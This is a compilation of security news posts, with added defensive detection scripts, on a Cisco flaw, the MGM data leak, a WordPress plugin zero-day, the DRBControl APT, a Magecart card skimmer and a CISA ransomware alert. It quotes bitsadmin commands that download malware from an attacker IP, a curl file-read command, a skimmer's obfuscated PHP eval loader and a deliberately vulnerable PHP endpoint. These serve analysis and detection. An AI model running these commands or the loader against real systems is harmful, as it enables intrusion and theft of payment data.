“A vulnerability in the High Availability (HA) service of Cisco Smart Software Manager On-Prem could allow an unauthenticated, remote attacker to access a sensitive part of the system with a high-privileged account.” reads the advisory published by Cisco.

“The vulnerability is due to a system account that has a default and static password and is not under the control of the system administrator.”

An attacker could exploit the flaw by using this default account to connect to a vulnerable system and obtain read and write access to system data.

The issue exposes a sensitive portion of the system, but Cisco pointed out that the attacker would not obtain full administrative rights over the device.

The vulnerability affects Cisco Smart Software Manager On-Prem releases prior to 7-202001, and only when the High Availability (HA) feature is enabled (it is disabled by default).


Cisco also addressed privilege escalation vulnerabilities in Unified Contact Center (CVE-2019-1888) and Data Center Network Manager (CVE-2020-3112), and a code execution vulnerability in NFV Infrastructure Software (CVE-2020-3138) that can only be exploited by local attackers.

The list of addressed flaws also includes two DoS issues in the Cisco Email Security Appliance, tracked as CVE-2019-1947 and CVE-2019-1983.

The remaining flaws patched by the company are a SQL injection in Cloud Web Security (CVE-2020-3154) and a remote code execution bug in Cisco IP Phones (CVE-2020-3111).

Pierluigi Paganini

(SecurityAffairs – hacking)

The post Cisco fixes a static default credential issue in Smart Software Manager tool appeared first on Security Affairs.

Personal details of 10.6M MGM Resorts guests leaked online

The personal information of 10.6 million guests who stayed at MGM Resorts hotels was stolen by hackers last summer and posted on a hacking forum this week.

ZDNet revealed in an exclusive report that the personal details of more than 10.6 million guests who stayed at MGM Resorts hotels have been published on a hacking forum this week.

The list of customers whose data was stolen includes celebrities (e.g. Justin Bieber), tech CEOs (e.g. Twitter CEO Jack Dorsey), reporters, government officials, and employees at some of the major tech companies.

The huge trove of data contains personal details for 10,683,188 former hotel guests, including full names, home addresses, phone numbers, emails, and dates of birth.

MGM Resorts Dump (source ZDNet)

ZDNet validated the authenticity of the data by contacting past guests of the hotel chain, including international business travelers, reporters attending tech conferences and CEOs attending business meetings.

The incident was confirmed by a spokesman for MGM via email.

“Within an hour after we reached out to the company, we were in a conference call with the hotel chain’s security team. Within hours, the MGM Resorts team was able to verify the data and track it to a past security incident.” reported ZDNet.

“An MGM spokesperson told ZDNet the data that was shared online this week stems from a security incident that took place last year.”

“Last summer, we discovered unauthorized access to a cloud server that contained a limited amount of information for certain previous guests of MGM Resorts,” MGM told ZDNet.

The company ruled out the theft of financial data, payment card data, or passwords.

“We are confident that no financial, payment card or password data was involved in this matter.”

The MGM Resorts chain confirmed it has already notified all impacted hotel guests and reported the incident to the authorities.

The company also investigated the extent of the incident with the help of two cybersecurity forensics firms.

“At MGM Resorts, we take our responsibility to protect guest data very seriously, and we have strengthened and enhanced the security of our network to prevent this from happening again,” the company said.

The availability of the dump in a hacking forum was first reported by the security firm Under the Breach.

According to MGM Resorts, the data is old: none of the customers in the archive stayed at its hotels after 2017.

In November 2018, the Marriott hotel chain announced that data from as many as 500 million guests at its Starwood hotels may have been compromised by a security breach that occurred in 2014.

The Marriott incident is the biggest data breach in the hospitality industry.

Pierluigi Paganini

(SecurityAffairs – hacking, MGM resorts)

The post Personal details of 10.6M MGM Resorts guests leaked online appeared first on Security Affairs.

Hackers are actively exploiting a Zero-Day in WordPress ThemeREX Plugin to create Admin Accounts

A new flaw has been discovered in a WordPress plugin: this time, experts found a zero-day vulnerability in the ThemeREX Addons plugin that is being exploited to create admin accounts.

Security experts from Wordfence have discovered a zero-day vulnerability in the ThemeREX Addons plugin that is being actively exploited in the wild to create user accounts with admin permissions.

According to Wordfence, the ThemeREX Addons plugin is currently installed on at least 44,000 websites.

The plugin was developed by the company ThemeREX to let its customers configure and install any of the more than 460 commercial WordPress themes and templates sold in its online shop.

The vulnerability resides in a WordPress REST-API endpoint registered by the plugin which allows any PHP function to be executed without administrative permissions.

“One of the plugin’s functions registers a WordPress REST-API endpoint. When doing so, it does not verify that a request is coming from an administrative user. While this is not cause for concern on its own, the endpoint allows any PHP function to be executed, rather than being limited to a select few functions.” reads the analysis published by Wordfence. “The most worrisome capability that we are seeing actively attacked is the ability to create a new administrative user, which can be used for complete site takeover.”

A remote attacker could exploit the flaw to execute arbitrary code on WordPress installs running the flawed plugin, including code that can inject administrative user accounts.
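The bug class Wordfence describes (a REST route registered without a permission check, whose handler runs a caller-chosen PHP function) is easy to spot in source. The scanner below is an added example, not Wordfence's tool or ThemeREX's code: it pulls every register_rest_route() call out of a PHP file and reports routes with no permission_callback, routes that are explicitly public, and handlers that dispatch on a request parameter. The plugin source it runs on is a constructed, hypothetical sample written for this illustration.

```python
import re

# Constructed sample of a hypothetical plugin (not ThemeREX code) used as input for the audit.
SAMPLE_PLUGIN_PHP = r"""<?php
add_action('rest_api_init', function () {
    // Properly protected: only administrators may call it.
    register_rest_route('demo/v1', '/settings', array(
        'methods'             => 'POST',
        'callback'            => 'demo_save_settings',
        'permission_callback' => function () { return current_user_can('manage_options'); },
    ));
    // The pattern described above: no permission check, and the handler
    // calls whatever PHP function name the request supplies.
    register_rest_route('demo/v1', '/run', array(
        'methods'  => 'POST',
        'callback' => function ($request) {
            return call_user_func($request['action'], $request['params']);
        },
    ));
    // Deliberately public, still worth a look during review.
    register_rest_route('demo/v1', '/status', array(
        'methods'             => 'GET',
        'callback'            => 'demo_status',
        'permission_callback' => '__return_true',
    ));
});
"""

def extract_calls(src, name="register_rest_route"):
    """Return the raw argument text of each call to `name`, tracking parentheses
    and PHP string literals so nested array()/closure arguments stay intact."""
    calls, pos = [], 0
    while (start := src.find(name + "(", pos)) != -1:
        i = j = start + len(name) + 1
        depth, quote = 1, None
        while j < len(src) and depth:
            c = src[j]
            if quote:
                if c == "\\":
                    j += 1          # skip the escaped character
                elif c == quote:
                    quote = None
            elif c in "'\"":
                quote = c
            elif c == "(":
                depth += 1
            elif c == ")":
                depth -= 1
            j += 1
        calls.append(src[i:j - 1])
        pos = j
    return calls

ROUTE_RE = re.compile(r"""^\s*['"]([^'"]+)['"]\s*,\s*['"]([^'"]+)['"]""")
PUBLIC_RE = re.compile(r"""permission_callback['"]?\s*=>\s*['"]__return_true['"]""")
DYNAMIC_RE = re.compile(r"\bcall_user_func(?:_array)?\s*\(\s*\$request")

def audit_rest_routes(src):
    """Return [(route, [reasons])] for every register_rest_route() call that lacks
    a permission_callback, is explicitly public, or dispatches on a request-
    controlled function name."""
    findings = []
    for args in extract_calls(src):
        m = ROUTE_RE.match(args)
        route = f"/{m.group(1).strip('/')}{m.group(2)}" if m else "<unparsed route>"
        reasons = []
        if "permission_callback" not in args:
            reasons.append("no permission_callback: any unauthenticated caller can reach it")
        elif PUBLIC_RE.search(args):
            reasons.append("permission_callback is __return_true: endpoint is public by design")
        if DYNAMIC_RE.search(args):
            reasons.append("handler calls a function whose name comes from the request")
        if reasons:
            findings.append((route, reasons))
    return findings

if __name__ == "__main__":
    for route, reasons in audit_rest_routes(SAMPLE_PLUGIN_PHP):
        print(route)
        for reason in reasons:
            print("   -", reason)
```

Run it over a plugin directory with `cat plugin/*.php | python audit.py`-style piping or by reading the files yourself; the `/run` route is the one to worry about. Since WordPress 5.5 the core emits a `_doing_it_wrong` notice for routes registered without a `permission_callback`, but older installs and plugins written before that stay silent, which is why a source scan is still useful.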

Unfortunately, a patch has yet to be released; for this reason, the experts suggest removing the ThemeREX Addons plugin from sites running a version greater than 1.6.50 until a fix is available.

“At the time of writing, this vulnerability is being actively exploited, therefore we urge users to temporarily remove the ThemeREX Addons plugin if you are running a version greater than 1.6.50 until a patch has been released.” continues the post.

The experts did not publish technical details of the zero-day because it is already being exploited in the wild.

“We have intentionally provided minimal details in this post in an attempt to keep exploitation to a bare minimum while also informing WordPress site owners of this active campaign,” concludes the post.

“For the time being, we urge that site owners running the ThemeREX Addons plugin remove it from their sites immediately.”

Other WordPress plugin issues recently made the headlines:

  • Jan. 2020 – An authentication bypass vulnerability in the InfiniteWP plugin that could potentially impact more than 300,000 sites.
  • Jan. 2020 – Over 200K WordPress sites are exposed to attacks due to a high severity cross-site request forgery (CSRF) bug in Code Snippets plugin.
  • Feb. 2020 – A serious flaw in the ThemeGrill Demo Importer WordPress theme plugin with over 200,000 active installs can be exploited to wipe sites and gain admin access to the site.
  • Feb. 2020 – A stored cross-site scripting (XSS) vulnerability in the GDPR Cookie Consent plugin that could potentially impact 700K users.

Pierluigi Paganini

(SecurityAffairs – hacking, WordPress)

The post Hackers are actively exploiting a Zero-Day in WordPress ThemeREX Plugin to create Admin Accounts appeared first on Security Affairs.

DRBControl cyber-espionage group targets gambling, betting companies

The DRBControl APT group has been targeting gambling and betting companies worldwide with malware that links to two China-linked APT groups.

Security researchers from TrendMicro have uncovered a cyber espionage campaign carried out by an APT group tracked as DRBControl that employed a new family of malware. The attackers aimed at stealing databases and source code from gambling and betting companies in Southeast Asia, and likely in Europe and the Middle East.

“The threat actor is currently targeting users in Southeast Asia, particularly gambling and betting companies. Europe and the Middle East were also reported to us as being targeted, but we could not confirm this at the time of writing.” reads the analysis published by Trend Micro. “Exfiltrated data was mostly comprised of databases and source codes, which led us to believe that the group’s main purpose is cyberespionage.”

Trend Micro became aware of the new backdoor after the group targeted a company in the Philippines using both common and custom malware and exploitation tools.

Threat actors used two previously unidentified backdoors, known malware families such as PlugX and the HyperBro backdoor, as well as custom post-exploitation tools. One of the backdoors leverages the file hosting service Dropbox as command-and-control (C&C).

The group was also observed using modified versions of common malware such as the PlugX and Trochilus RATs, keyloggers built with the Microsoft Foundation Class (MFC) library, the custom in-memory HyperBro backdoor, and a Cobalt Strike sample.

The arsenal of the attackers includes post-exploitation tools such as password dumpers (Quarks PwDump, modified Mimikatz, NetPwdDump), tools for bypassing UAC, and code loaders.

Experts identified two main backdoors in DRBControl’s arsenal (Type 1 and Type 2), both previously unknown in the threat landscape.

The Type 1 backdoor is launched through DLL side-loading and is accompanied by a second backdoor whose role is to execute additional malware downloaded from Dropbox and loaded directly in memory.

The malware was used to steal Office and PDF documents, keystroke logs, SQL dumps, browser cookies, and a KeePass password manager database.

The Type 2 backdoor uses a configuration file that includes the C&C domain and port, as well as the directory and filename the malware copies itself to. The configuration is stored, obfuscated, in a registry key that also serves persistence.

Both backdoors implement a User Account Control (UAC) bypass and a keylogging feature.

Researchers observed that the first variant of the Type 1 backdoor dates to late May 2019, while version 9.0 is dated October 2019.

The Type 2 backdoor first appeared in July 2017, when it was delivered in a spear-phishing attack via a weaponized Microsoft Word document.


This suggests that DRBControl has been active since at least 2017, though Trend Micro speculates it has had a longer run.

Trend Micro experts believe this is the first time the DRBControl group has been tracked by security researchers. They linked DRBControl to other China-linked APT groups, including Winnti and Emissary Panda (a.k.a. BRONZE UNION, APT27, Iron Tiger, LuckyMouse).

Evidence of the links to the Winnti group includes mutexes, domain names and issued commands.

Researchers noticed two commands issued on a compromised machine to download malicious executables from a domain. One of the executables (t32d.exe) had previously been seen contacting a different domain associated with Winnti infrastructure.

  • bitsadmin /transfer n http://185.173.92[.]141:33579/i610.exe c:\users\public\wget.exe
  • bitsadmin /transfer n http://185.173.92[.]141:33579/t32d.exe c:\users\public\wget.exe
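The two bitsadmin commands above are a compact example of a living-off-the-land download cradle, and each of their details (bare IP, odd port, executable fetched into C:\Users\Public, renamed on disk) is something a process-creation hunt can score. The script below is an added example of such a hunt, not Trend Micro's tooling or anything from the report: it parses bitsadmin /transfer command lines from Sysmon-style events and lists why each one looks suspicious. The events are constructed for this illustration; only the first two command lines come from the page.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style). The first two command
# lines are the ones Trend Micro observed, quoted above; the rest are made up for contrast.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /transfer n http://185.173.92[.]141:33579/i610.exe c:\users\public\wget.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /transfer n http://185.173.92[.]141:33579/t32d.exe c:\users\public\wget.exe"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"bitsadmin /transfer WinUpdate https://dl.example.corp/patch.msu C:\ProgramData\Updates\patch.msu"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /list /allusers"},
]

TRANSFER_RE = re.compile(
    r"bitsadmin(?:\.exe)?\s+/transfer\s+(?P<job>\S+)\s+"
    r"(?:/(?:download|upload)\s+|/priority\s+\S+\s+)*"
    r"(?P<url>https?://\S+)\s+(?P<dest>\S+)", re.I)
URL_RE = re.compile(r"https?://([^/:]+)(?::(\d+))?(/\S*)?", re.I)
STAGING_DIRS = (r"\users\public", r"\appdata\local\temp", r"\windows\temp")
EXEC_EXT = re.compile(r"\.(?:exe|dll|ps1|bat|scr|com)$", re.I)

def refang(text):
    """Undo common defanging ('[.]', 'hxxp') so the URL can be parsed."""
    return text.replace("[.]", ".").replace("hxxp", "http")

def analyze_bitsadmin(cmdline):
    """Return {'url', 'dest', 'reasons'} for a bitsadmin /transfer command, else None."""
    m = TRANSFER_RE.search(cmdline)
    if not m:
        return None
    url, dest = refang(m.group("url")), m.group("dest")
    host, port, path = URL_RE.match(url).groups()
    path = path or "/"
    reasons = ["bitsadmin /transfer used as a download cradle (LOLBin)"]
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        reasons.append(f"download from a bare IP address ({host})")
    if port and port not in ("80", "443"):
        reasons.append(f"non-standard port {port}")
    if EXEC_EXT.search(path):
        reasons.append("remote file has an executable extension")
    if any(d in dest.lower() for d in STAGING_DIRS):
        reasons.append(f"saved to a world-writable staging directory ({dest})")
    remote_name = path.rsplit("/", 1)[-1]
    local_name = dest.replace("/", "\\").rsplit("\\", 1)[-1]
    if remote_name and local_name.lower() != remote_name.lower():
        reasons.append(f"renamed on disk ({remote_name} -> {local_name})")
    return {"url": url, "dest": dest, "reasons": reasons}

def hunt(events, min_reasons=3):
    """Return [(event index, analysis)] for events that score like malicious cradles."""
    hits = []
    for idx, ev in enumerate(events):
        result = analyze_bitsadmin(ev.get("CommandLine", ""))
        if result and len(result["reasons"]) >= min_reasons:
            hits.append((idx, result))
    return hits

if __name__ == "__main__":
    for idx, result in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {result['url']} -> {result['dest']}")
        for reason in result["reasons"]:
            print("   -", reason)
```

The threshold of three reasons keeps a legitimately scripted `bitsadmin /transfer` of a patch from a corporate host out of the results while both DRBControl commands score six; tune the staging-directory list and the threshold to your environment.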

Experts pointed out that the HyperBro backdoor is exclusive to Emissary Panda.

At this time it is not possible to attribute DRBControl to a specific threat actor with high confidence; it is unclear whether the attackers form a new APT group or a subgroup of a known China-linked APT.

“Attribution is a complicated aspect of cybersecurity, and it is not the goal of this publication. What we have discovered in our analysis, however, is the existence of a significant number of indicators of compromise (IoCs) and intriguing connections with at least two known APT groups.” concludes TrendMicro.

“The threat actor described here shows solid and quick development capabilities regarding the custom malware used, which appears to be exclusive to them. The campaign exhibits that once an attacker gains a foothold in the targeted entity, the use of public tools can be enough to elevate privileges, perform lateral movements in the network, and exfiltrate data.”

Additional technical details, such as IoCs, are included in the report published by TrendMicro.

Pierluigi Paganini

(SecurityAffairs – hacking, DRBControl)

The post DRBControl cyber-espionage group targets gambling, betting companies appeared first on Security Affairs.

Uncovering New Magecart Implant Attacking eCommerce

Security expert Marco Ramilli shared the results of an analysis of a skimmer implant spotted in the wild that could be potentially linked to Magecart group.

If you are a credit card holder, this post may be of interest to you. Defending our financial assets is always one of the top priorities in the cybersecurity community and, on the other side of the coin, stealing money is one of the most romantic attacks performed by cyber-criminals. Today I’d like to share the analysis of a skimmer implant spotted in the wild. So far I am not a hundred percent sure that the discovered implant is an evolution of Magecart, since the activation scripts are quite different even though they do use the Magento core infrastructure. To my current understanding we might be facing a new Magecart version or a new framework altogether; notes and suggestions are always welcome.

Disclaimer

National law enforcement units have been alerted; a few hours have passed since they gave me the authorization to publish this post. If you used your credit card on one of the following eCommerce sites (IoC section), consider your credit card compromised: call your bank and follow the deactivation steps. Since the C2 and the relays are still up and running, the addresses have been obfuscated in order to avoid replication. I want to thank Daniele B. for giving me the first “wired eCommerce”.

Analysis

Everything starts from a vulnerable eCommerce website. The user does not notice anything odd: she adds items to her cart as usual, browsing from page to page, and finally checks out by registering a new account or simply proceeding as a guest. However, the attacker, having abused a vulnerability in the eCommerce platform, has injected a malicious JavaScript that sends her information (for example name, address, email, credit card number, CVV, expiration date, and so on) to another host belonging to the cyber-criminal. The following picture illustrates the point.

Fig1: External Connection outside the eCommerce Perimeter

From Fig1 we see an alien connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.]php . This POST carries a quite interesting payload, partially shown (to avoid leaking information) in the next code section.

touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

The encrypted/encoded data lands on an external gate hosted on *****.]com. This is a slightly different behavior compared to the original Magecart, which used to send data directly in base64 format. The relay looks like a legitimate eCommerce website that was compromised and used as a relay (one more difference from Magecart). A further investigation of this relay shows a Magento core installation (a common indicator of Magecart) which includes js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php), a tool for dynamically building a composite JavaScript file for better performance and compression. By using this public Magento core functionality and by guessing file paths (looking for known public folders on the host helps), we can obtain the original malicious back-end file injected by the attacker.

curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php

The result follows:

<?php
if(isset($_GET['touch']))
    $_POST['touch']=$_GET['touch'];

eval(gzuncompress(base64_decode('...')));   // base64-encoded, compressed second stage omitted here

We are now facing the initial stage of obfuscated PHP code. The following image (Fig2) shows how the attacker obfuscated the first stage. Note the activation variable “touch”, which triggers the process in both flavors: GET and POST. Once the activation variable is found, a compressed and encoded payload is assembled through a chain of variable concatenations and then executed (eval).

Fig2: Payload Stage 1

Following the obfuscation chain in reverse order we end up with the code in Fig3. This time the attacker used more obfuscation techniques: switching charsets and sprinkling junk code and random comments, making the overall reading quite hard. But taking my time, ordering every single line, substituting variables and re-encoding with my favorite charset, I was able to extract the decoding loop and quickly understand the payload’s behavior.

Fig3: Payload Stage 3

Indeed, once the script decodes the payload received from the compromised eCommerce site (by rotating over charsets with hard-coded strings; Fig3 decodes the touch variable’s content), every stolen field is arranged into a crafted object and sent to one more external host: https:]//^^^^^.]su/gate/proxy. The following strings extracted from the script help in understanding the execution chain.

REMOTE_ADDR
Content-Type: text/html; charset=utf-8
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
%&=
Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0
touch host number exp1 exp2 cvv firstname lastname address city state zip country phone email
HTTP_USER_AGENT
Number Domain CVV Date/ billing:firstname billing:lastname Holder billing:email billing:street1 billing:postcode billing:region_id billing:city billing:country_id billing:telephone
hash= &ua= &ip=
https:]//^^^^^^^.]su/gate/proxy
var js_ar=;

We have one more host that needs to be analyzed. Taking a closer look at the domain used, it appears to be the final proxy gate, which stores data in a database (MongoDB). Again, by enumerating and digging through its public information it was possible to identify the technology used to stand up the new malicious implant (docker-compose to build the infrastructure). By spotting a temporary directory, used to store temporary files exchanged within the attacker’s infrastructure, I was able to build a simple monitoring script that revealed the most active compromised eCommerce sites.
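Whatever the encoding of the moment, the constant in this chain is an HTTP POST leaving a checkout page for a host that is not the shop (Fig1), and in the older Magecart variant mentioned above the fields went out base64-encoded. The following is an added example, not part of the original analysis: a small checker that, given a capture of what a checkout page sent, flags cross-origin POSTs and explains why, looking for Luhn-valid card numbers in plaintext, hex or base64 parameter values and for opaque blobs it cannot decode. The shop host and all request records are constructed for this illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, urlsplit

SHOP_HOST = "shop.example"   # the store's own host; anything else is a third party

# Constructed capture of what a checkout page sent (in the spirit of Fig1; not real traffic).
CHECKOUT_PAGE = "https://shop.example/checkout/onepage/"
SAMPLE_REQUESTS = [
    {"page": CHECKOUT_PAGE, "method": "POST",
     "url": "https://shop.example/checkout/onepage/savePayment",
     "body": "payment[cc_number]=4111111111111111&payment[cc_cid]=123"},
    {"page": CHECKOUT_PAGE, "method": "GET",
     "url": "https://cdn.example.net/js/bundle.js", "body": ""},
    # Opaque blob to a .php script on a third-party host, like the 'touch' POST above.
    {"page": CHECKOUT_PAGE, "method": "POST",
     "url": "https://relay.example/js/ar/ar2497.php",
     "body": "touch=" + "a1b2c3d4e5f6" * 8},
    # Older Magecart style: the fields go out base64-encoded in the clear.
    {"page": CHECKOUT_PAGE, "method": "POST",
     "url": "https://gate.example/gate.php",
     "body": "data=" + quote(base64.b64encode(b"number=4111111111111111&cvv=123&exp=12/25").decode())},
]

PAN_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")
BLOB_RE = re.compile(r"[0-9a-fA-F]{64,}|[A-Za-z0-9+/]{64,}={0,2}")

def luhn_ok(digits):
    """Luhn checksum, so random digit runs are not reported as card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def decoded_views(value):
    """Yield the value as-is plus its hex- or base64-decoded text (skimmers rarely send
    plaintext). Undecodable input yields nothing extra."""
    yield value
    try:
        if re.fullmatch(r"[0-9a-fA-F]+", value) and len(value) % 2 == 0:
            yield bytes.fromhex(value).decode("ascii", "ignore")
        else:
            padded = value + "=" * (-len(value) % 4)
            yield base64.b64decode(padded, validate=True).decode("ascii", "ignore")
    except (binascii.Error, ValueError):
        return

def card_numbers(text):
    """Masked Luhn-valid 13-19 digit runs found in the text or its decoded forms."""
    found = []
    for view in decoded_views(text):
        for pan in PAN_RE.findall(view):
            if luhn_ok(pan):
                found.append(pan[:6] + "*" * (len(pan) - 10) + pan[-4:])
    return found

def flag_exfil(requests, shop_host):
    """Flag POSTs leaving a checkout page for hosts other than the shop, with reasons."""
    findings = []
    for req in requests:
        on_checkout = re.search(r"/(checkout|onepage)\b", urlsplit(req["page"]).path)
        target = urlsplit(req["url"])
        if not on_checkout or target.hostname == shop_host or req["method"] != "POST":
            continue
        reasons = []
        params = dict(parse_qsl(req["body"], keep_blank_values=True))
        for name, value in params.items():
            pans = card_numbers(value)
            if pans:
                reasons.append(f"card number {', '.join(pans)} in parameter '{name}'")
            elif BLOB_RE.fullmatch(value):
                reasons.append(f"opaque {len(value)}-char blob in parameter '{name}'")
        if target.path.endswith(".php"):
            reasons.append("posts to a .php script on a third-party host")
        if not reasons:
            reasons.append("cross-origin POST from a checkout page")
        findings.append((req["url"], reasons))
    return findings

if __name__ == "__main__":
    for url, reasons in flag_exfil(SAMPLE_REQUESTS, SHOP_HOST):
        print(url)
        for reason in reasons:
            print("   -", reason)
```

A cross-origin POST from a payment page deserves a look even when nothing decodes, which is why an undecodable blob is reported rather than ignored; the same signal can be enforced up front with a `Content-Security-Policy` `connect-src` and `form-action` allow-list on the checkout pages.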

Attack Magnitude

From the command and control host we can observe what actually passes through it, but we have no idea of the overall magnitude of the infection chain, since many eCommerce sites may have a low sales rate (few customers during my monitoring window). Even if compromised, such sites are very hard to discover with this technique, which relies on collecting, converting and importing the temporary files generated every time data leaks (that is, every time a user enters a credit card). So we need another method. Fortunately the host has a PTR (pointer) record to mo-------.]fvds].ru, as shown in Fig4.

Fig4: PTR on ^^^^^^.su

The new host (mo-------) clearly recalls the registered email address of mag^^^^^^.]su (mo------@protonmail.]com) in a unique way. By the way, it has been active since 2019-07!

Fig5: registered eMail Address

According to URLSCAN, using the PTR record to find out how many known websites have links pointing to mo-----.]fvds.]ru, you find something quite worrying (as shown in Fig6): more than 1,400 potentially infected eCommerce sites. Now, I am not saying that every single eCommerce site in the list has been compromised, but taking 3 of them at random (reported in the IoC section) I found the exact same infection chain on each one. So potentially every eCommerce site on that list (i.e. every one that points to the command and control) should be checked.

Fig6: Link on m——–fvds.]ru

According to urlscan.io, most of the websites pointing to momo--------s.]ru follow the geographic distribution shown in Fig7: most are US based, followed by RU, NL and IN. While it is hard to say that this is a targeted attack against US eCommerce websites, the stats (Fig7) are surprisingly telling.

Fig7: Location of Possible Compromised eCommerce

The original post is available on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

Pierluigi Paganini

(SecurityAffairs – hacking, Magecart)

The post Uncovering New Magecart Implant Attacking eCommerce appeared first on Security Affairs.

5 Ways artificial intelligence Is Being Used to Keep Sensitive Information Secure

Artificial intelligence is an immensely helpful tool for businesses and consumers alike; here is how it is being used to keep sensitive information secure.

Artificial intelligence (AI) is an immensely helpful tool for businesses and consumers alike. By processing data quickly and predicting analytics, AI can do everything from automating systems to protecting information.

In fact, keeping data secure is a significant part of what AI does in the modern world, even though some hackers use the same technology for their own ends.

The more we use artificial intelligence for protection, the better we are able to combat high-tech hackers. Here are just a few ways AI is securing our data.

1. Early Detection

Many hackers take a passive approach, infiltrating systems to steal information without disrupting operations. Such intrusions can take months or even years to notice, if they are found at all. With AI, businesses can detect an attack far earlier, in some cases as soon as the intruder enters the system.

The volume of cyber threats is massive, especially since many hackers automate their work. These attacks are too much for humans to fight alone. AI, however, is a tireless multitasker, able to spot malicious activity quickly and either alert humans or lock the attacker out.

2. Predict & Prevent

Part of the detection process is predicting activity before it happens. The New York Police Department made one of the earliest implementations of predictive technology in 1995. Its system, CompStat, combines software with a management philosophy and organizational practices. This predictive policing approach soon spread to other police departments across the United States.

Being high alert at all times is difficult, even for AI and other forms of automated software. By predicting threats, systems can create specific defenses before an attack takes place. With this technique, the system runs with as much efficiency as possible without sacrificing security, especially since there are measures in place at all times.

3. Encryption

While detecting a threat as it enters a system is valuable, the goal is to make sure intruders cannot get at the data at all. Companies can build walls of defense in many ways, one of which is camouflaging the data itself. When information moves from one system to another, it is particularly susceptible to interception and theft. Therefore, businesses need encryption along the way.

Encryption transforms the data into something that looks meaningless, like a code, which the receiving system then decrypts on the other side.

Meanwhile, any hacker viewing the information will see random bits of text with no apparent meaning. Programs like iManage, which works with law firms and corporate legal departments, implement encryption as the first line of defense. 

4. Password Protection & Authentication

Passwords are the baseline of cybersecurity. While hackers can often bypass them, going without one is asking for someone to steal your data. Adding AI to the mix can make authentication more secure.

Before, a password was a word or phrase. In the modern era, words don’t cut it. Instead, companies use movements, patterns and biometrics to unlock information. Biometrics refers to using something unique to one’s body to open something, like retinal scans and fingerprints.

Apple’s iPhone X, for instance, uses a feature called Face ID, which maps your facial features with infrared sensors and uses that information in place of a password.

5. Multi-Factor Authentication

Better than one very good password is requiring several independent factors. Multi-factor authentication changes how these credentials work: logging in from an unfamiliar location, for instance, can require the user to enter an additional one-time code. Paired with an AI detection system, the requirements can even change dynamically.

By allowing itself to be dynamic and working in real-time, access can modify itself in the event of an attack. Multi-factor doesn’t just create multiple walls of security but is also smart about who it lets in.

Such a system learns about the people entering the network, building patterns of their behavior and habits, cross-referencing them against known malicious activity and adjusting their access privileges accordingly.

AI Changing Cybersecurity

AI technology can, more or less, act on its own: it can detect patterns, find faults and even execute plans to fix issues. In the realm of cybersecurity, this creates a whole new layer of protection.

With the addition of artificial intelligence, the entire aspect of cybersecurity has changed forever and continues to evolve at a rapid pace. The more advances we reach, the more the field will change. A decade from now, we may not even recognize security features from when the internet first came about.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – artificial intelligence, sensitive information)

The post 5 Ways artificial intelligence Is Being Used to Keep Sensitive Information Secure appeared first on Security Affairs.

US CISA warns of Ransomware attacks impacting pipeline operations

The Cybersecurity and Infrastructure Security Agency (CISA) is warning critical U.S. infrastructure operators of a recent ransomware attack that affected a natural gas compression facility.

The Cybersecurity and Infrastructure Security Agency (CISA) issued an alert across critical U.S. infrastructure sectors about a recent infection at a natural gas compression facility.

“The Cybersecurity and Infrastructure Security Agency (CISA) responded to a cyberattack affecting control and communication assets on the operational technology (OT) network of a natural gas compression facility. A cyber threat actor used a Spearphishing Link [T1192] to obtain initial access to the organization’s information technology (IT) network before pivoting to its OT network.” reads the alert published by CISA. “The threat actor then deployed commodity ransomware to Encrypt Data for Impact [T1486] on both networks. Specific assets experiencing a Loss of Availability [T826] on the OT network included human machine interfaces (HMIs), data historians, and polling servers.”

The attackers initially used a spear-phishing link to infiltrate the IT network, then pivoted to the OT network. This was possible because the victim had not implemented robust segmentation between the IT and OT networks. The attackers then deployed ransomware that encrypted files on both networks, causing the loss of availability of human-machine interfaces (HMIs), data historians, and polling servers.

Once the networks were infected with the ransomware, internal assets were no longer able to read and aggregate the real-time operational data reported by low-level OT devices, causing a partial loss of view for human operators.

According to the alert, the infection did not impact any programmable logic controllers (PLCs) on the affected networks because the malware was designed to infect only Windows devices, and the organization never lost control of operations during the attack.

In response to the incident, the organization implemented a deliberate and controlled shutdown of operations for approximately two days. The incident resulted in a loss of productivity and revenue, after which normal operations resumed.

The CISA alert provides planning and operational mitigations, as well as technical and architectural mitigations, that organizations in critical infrastructure sectors should implement to avoid similar ransomware attacks.
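The architectural mitigation that would have stopped the pivot described above is segmentation: an IT host should have no direct path to an HMI, only a brokered one through a DMZ. As an added illustration (not from the CISA alert), here is a check an operator could run over firewall flow records to see whether that holds. The zone map, the policy and the flow records are all constructed for a hypothetical site, and the "flat" policy at the end shows how the pivot goes unnoticed once IT-to-OT SMB and RDP are allowed.

```python
import ipaddress

# Constructed zone map for a hypothetical site (not from the CISA alert).
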